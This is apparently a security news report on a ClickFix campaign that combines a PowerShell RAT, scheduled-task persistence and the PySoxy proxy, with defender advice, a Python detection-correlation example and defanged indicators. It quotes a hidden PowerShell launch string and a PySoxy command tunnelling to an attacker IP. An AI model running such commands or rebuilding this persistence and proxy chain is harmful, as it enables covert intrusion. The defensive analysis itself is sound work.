A newly observed ClickFix campaign is pushing beyond simple user-triggered infections, introducing a more persistent and stealthy intrusion chain using PySoxy, a 10-year-old open-source Python SOCKS5 proxy.
Unlike traditional ClickFix attacks that rely on a single PowerShell execution, this campaign builds a layered access model.
A single user action, typically executing a malicious PowerShell command copied from a compromised website, initiates a full attack chain involving persistence, reconnaissance, and multiple command-and-control (C2) channels.
The attack begins with a familiar lure. A user visits a compromised site and is tricked into running an obfuscated PowerShell command via explorer.exe.
While this matches known ClickFix techniques, the post-execution behavior is significantly more advanced.
Researchers at ReliaQuest uncovered the activity in April 2026, marking the first known case where ClickFix combines scheduled task persistence with Python-based encrypted proxying to maintain long-term access.
Instead of stopping at initial access, the command deploys a staged PowerShell script that operates as a lightweight remote-access trojan (RAT).
This script communicates with attacker infrastructure every few seconds, retrieves commands, executes them in memory, and sends results back without dropping traditional malware on disk.
At the same time, the attacker establishes persistence using a scheduled task. This task re-executes the malicious script approximately every 40 minutes using stealthy arguments like:
- powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden
This ensures the attack survives process termination or temporary network blocking, effectively turning a one-time execution into a recurring foothold.
Once persistence is in place, the attacker shifts to discovery. Built-in Windows tools are used to enumerate user privileges, domain roles, and domain controllers. Additional activity includes LDAP queries and SMB interactions to map the network environment.
This phase is critical. It confirms that the compromised host can support further operations and helps the attacker identify high-value targets before deploying additional tooling.
Open-Source Python SOCKS5 Proxy
After reconnaissance, the attacker introduces PySoxy, downloaded as a compiled Python bytecode file into the ProgramData directory. Executed via python.exe, the tool establishes an encrypted proxy tunnel back to attacker-controlled infrastructure over port 443.
A typical command observed:
- python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97
This step fundamentally changes the intrusion. Instead of relying solely on PowerShell-based C2, the attacker now has a second, independent access channel using proxy traffic.
Because PySoxy traffic resembles normal encrypted communication, it is harder to detect and classify.
One of the most critical findings is that blocking outbound connections does not stop the attack. In the observed case, both C2 channels were blocked by security controls, yet the scheduled task continued attempting to relaunch the attack chain for hours.
This highlights a key risk: containment efforts that focus only on network indicators may fail if local persistence mechanisms remain intact.
The modular nature of this campaign makes detection difficult. Individual behaviors (PowerShell execution, scheduled task creation, Python usage) may appear benign in isolation. However, when correlated, they reveal an active compromise.
Security teams are advised to:
- Isolate affected systems immediately rather than relying on connection blocking.
- Review scheduled tasks created shortly after suspicious activity.
- Analyze ProgramData for staged scripts and Python artifacts.
- Hunt for unusual Python command lines with proxy-related arguments like -ssl or -remote_ip.
- Investigate PowerShell-to-Python execution chains and file transfers.
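The correlation the article describes, as an added example that is not from the ReliaQuest report: a small Python hunt over constructed, Sysmon-like process-creation records that labels the three weak signals (hidden PowerShell launched from explorer.exe, a scheduled task that re-runs PowerShell, python.exe with proxy-style arguments) and alerts per host only when they cluster. The record layout, label names and the sample destination IP (a TEST-NET placeholder, not the real indicator) are assumptions.

```python
# Added example, not code from the report. Sample events are constructed and
# Sysmon-like: (host, ISO timestamp, parent image, image, command line).
from collections import defaultdict
from datetime import datetime, timedelta

EVENTS = [
    ("WS01", "2026-04-10T09:00:05", "explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -enc AAAA"),
    ("WS01", "2026-04-10T09:00:40", "powershell.exe", "schtasks.exe",
     'schtasks /create /sc minute /mo 40 /tn Updater /tr "powershell.exe -NoProfile -WindowStyle Hidden"'),
    ("WS01", "2026-04-10T09:12:10", "powershell.exe", "python.exe",
     # 203.0.113.5 is a TEST-NET placeholder, not the indicator from the report
     "python.exe C:\\ProgramData\\b64.pyc -ssl -remote_port 443 -remote_ip 203.0.113.5"),
    ("WS02", "2026-04-10T09:30:00", "explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -Command Get-Date"),   # routine admin use, must not alert
]

def classify(parent, image, cmdline):
    """Return the weak-signal label for one process-creation event, or None."""
    c = cmdline.lower()
    if (image == "powershell.exe" and parent == "explorer.exe"
            and "-windowstyle hidden" in c and "-executionpolicy bypass" in c):
        return "hidden_powershell_from_explorer"   # ClickFix-style user-triggered launch
    if image == "schtasks.exe" and "/create" in c and "powershell" in c:
        return "scheduled_task_persistence"        # task that re-runs a PowerShell stage
    if image == "python.exe" and ("-remote_ip" in c or "-ssl" in c):
        return "python_proxy_args"                 # PySoxy-style proxy command line
    return None

def correlate(events, window=timedelta(hours=1), threshold=2):
    """Collect signals per host; alert when >= threshold distinct labels fall in window."""
    signals = defaultdict(list)
    for host, ts, parent, image, cmdline in events:
        label = classify(parent, image, cmdline)
        if label:
            signals[host].append((datetime.fromisoformat(ts), label))
    alerts = {}
    for host, hits in signals.items():
        hits.sort()
        start = hits[0][0]                         # window opens at the first weak signal
        distinct = {label for t, label in hits if t - start <= window}
        if len(distinct) >= threshold:
            alerts[host] = sorted(distinct)
    return alerts

if __name__ == "__main__":
    print(correlate(EVENTS))   # only WS01 clusters all three signals
```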
This campaign signals a broader evolution in ClickFix tradecraft. Attackers are no longer relying on single-stage payloads but are instead building flexible, multi-layered access using legitimate tools and older open-source software.
The use of PySoxy demonstrates that even decade-old tools can be repurposed effectively to evade detection.
More importantly, it shows how attackers are adopting a “bring your own interpreter” approach, leveraging existing runtimes like Python to avoid dropping recognizable malware.
As ClickFix continues to evolve, defenders must treat such incidents as full-scale intrusions rather than isolated user errors, especially when persistence and secondary tooling are involved.
IOCs
| Artifact | Details |
| --- | --- |
| 185.205.211[.]217 | ClickFix Infrastructure IP |
| 206.206.103[.]120 | PowerShell RAT C2 |
| 206.206.103[.]106 | Staging and Exfiltration IP |
| 167.99.158[.]97 | PySoxy Proxy Destination IP |
| strapness[.]com | ClickFix Stager Domain |
| abledom[.]net | Secondary C2 Domain |
| overlateise[.]com | Hosted the ClickFix script (/api/jquery[.]js) injected into the compromised site |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.